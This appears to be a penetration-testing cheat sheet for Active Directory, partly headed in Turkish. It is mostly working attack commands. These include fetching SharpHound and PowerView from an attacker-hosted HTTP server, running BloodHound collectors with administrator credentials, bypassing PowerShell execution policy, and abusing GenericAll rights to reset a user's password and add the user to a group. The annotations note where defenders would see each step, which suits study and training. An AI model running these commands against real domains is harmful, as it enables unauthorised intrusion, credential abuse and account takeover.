LDAP (389,636)

BloodHound

# Local Attack — the collector runs on a host that is already joined to the domain.
# Attacker side: serve the working directory (updog's default, presumably) over
# HTTP on port 80 so the target can fetch SharpHound.exe (see the iwr step).
# Plain HTTP, so the transfer is visible to anything monitoring the path between
# the two hosts.
updog 80
# Target side: download SharpHound from the attacker's web server, then run a
# full collection (-c All). Both the download and the collector's domain
# queries originate from this host, which is where a defender would see them.
iwr -uri http://192.168.1.2/SharpHound.exe -Outfile SharpHound.exe
# Output is an archive for import into BloodHound (written to the working
# directory by default — verify on the version in use).
.\SharpHound.exe -c All

# Remote Attack — collect from the attacker machine with known domain
# credentials; nothing is copied to or executed on a target. Two collectors:
#   bloodhound-python: -ns is the name-server address used to resolve the domain.
#     NOTE(review): 172.0.0.1 is not an RFC 1918 address — confirm it is the
#     intended DC/DNS address and not a typo.
#   nxc ldap: collects over LDAP (--bloodhound --collection All).
# Both authenticate as 'administrator', so the logon shows up on the DC either
# way; the clear-text password is also on the command line (shell history, ps).
bloodhound-python -c all -ns 172.0.0.1 -d INLANEFREIGHT.LOCAL -u administrator -p 'password123' --zip
nxc ldap 192.168.1.1 -u administrator -p 'password123' --bloodhound --collection All

# Attacker — analysis workstation. BloodHound's GUI reads from a local neo4j
# instance, so the database must be running before the GUI is started.
# The trailing comment records neo4j's default login; change it on first
# login, since the graph will hold the collected domain data.
neo4j start # default login neo4j:neo4j
bloodhound

// Cypher queries for the neo4j console or BloodHound's raw-query box.
// Return every Computer node.
MATCH (m:Computer) RETURN m 
// Return every User node.
MATCH (m:User) RETURN m
// Return every path along a HasSession edge from a Computer to a User,
// i.e. which users have sessions on which machines.
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Tehlikeli İzinler

GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit the ACEs applied to the object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to an object, for example a group


# GenericAll (Full Access) — with GenericAll over john's user object the
# holder can reset the password and change group membership directly.
# Reset john's password (net user <user> <newpassword> /domain); the DC's
# password-reset audit event on the target account is the defender's footprint.
net user john Password123 /domain
# Add john to the group; membership changes are likewise audited on the DC.
net group "Management Department" john /add /domain

# Open a shell as john with the new password (runas prompts for it).
runas /user:domain.local\john "cmd.exe"

PowerView

# Attacker side: copy PowerView out of the Kali powersploit package and serve
# the current directory over HTTP on port 80 (python's http.server serves the
# working directory) so the target can fetch it.
cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
python -m http.server 80

# Target side: fetch PowerView, start PowerShell with the execution policy
# bypassed (-ep bypass) so the unsigned script can be loaded, then import it.
# Script-block logging, where enabled, captures the imported module's content.
iwr -uri http://192.168.1.2/PowerView.ps1 -Outfile PowerView.ps1
powershell -ep bypass
Import-Module .\PowerView.ps1

# PowerView enumeration — read-only queries (presumably LDAP against the DC,
# plus SMB probes for sessions and shares); nothing here changes the domain,
# so the footprint is query volume on the DC and probes against individual hosts.
Get-NetDomain # Domain information
Get-NetUser # All users
Get-NetUser -SPN | select samaccountname,serviceprincipalname # Users that have an SPN
Get-NetUser | select cn # Only the cn property
Get-NetGroup # All groups
Get-NetComputer # Computer objects
Find-LocalAdminAccess # Do we have local admin rights on any computer in the domain?
Get-NetSession -ComputerName client74 # Session check on client74
Get-ObjectAcl -Identity stephanie # List the ACEs on the stephanie object
Find-DomainShare # List domain shares
Find-DomainShare -CheckShareAccess # Only the shares we can actually open
